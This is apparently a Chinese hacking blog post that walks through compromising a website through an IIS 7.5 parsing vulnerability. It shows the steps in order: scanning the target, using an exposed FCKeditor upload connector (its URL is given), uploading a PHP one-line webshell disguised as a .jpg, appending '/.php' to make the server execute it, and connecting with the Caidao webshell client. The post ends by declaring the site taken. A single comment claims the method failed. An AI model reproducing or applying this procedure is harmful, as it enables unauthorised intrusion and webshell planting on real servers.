首页 » 网站攻防 » 浏览内容

网站IIS7.5解析漏洞利用实例演示

3204 1 发表评论

本来之前有个类似的文章了,不过前面基本都是讲的IIS6.0存在的解析漏洞.

那么在IIS7.5版本是不是也存在解析漏洞。

好了,进入正题。

先来确定下是不是IIS7.5的,先用wwwscan来扫描下。

结果如下图所示:

存在FCK,大大的打开了方便之门,直接上传,毫无压力

各种的上传存在:
http://www.xxxx.com/FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=../../connectors/aspx/connector.aspx
确定这个是可以正常打开的,我们上传个php一句话马儿,其实就是php一句话改名为jpg,伪装成为图片:

233541irkh1f1p5birkhg7

现在我们去查找路径,打开首页。
找了半天好不容易遇见一个图片,地址是:http://www.xxxx.com/UploadFiles/image/php.jpg

然后根据IIS 7.5的解析漏洞利用手法,在正常图片URL后添加/.php
http://www.xxxx.com/UploadFiles/image/php.jpg/.php

然后菜刀连接上去:

好了到处已经成功拿下。

标签:

评论 共 1 条 (RSS 2.0) 发表 评论

  1. 会员头像 学生处说道:

    根本不行我在IIS7.5下面根本不行侥幸

发表评论

  •   没有头像?

关注我们,实时联系

通知公告">更多...

♥如果喜欢本站可以直接点击订阅博客
♥点击此加入晓残博客会员群加入扣群
♥本站免费提供加密解密服务点击解密
♥伙伴们喜欢本站赏个好评呗

关注微信

有偿服务

博客统计

  • 日志总数:477 篇
  • 评论数目:1474 条
  • 标签总数:40 个
  • 页面总数:8 个
  • 分类总数:17 个
  • 友链总数:24 个
  • 建站日期:2011-02-13
  • 运行天数:2124 天
  • 最后更新:2016-12-6

订阅博客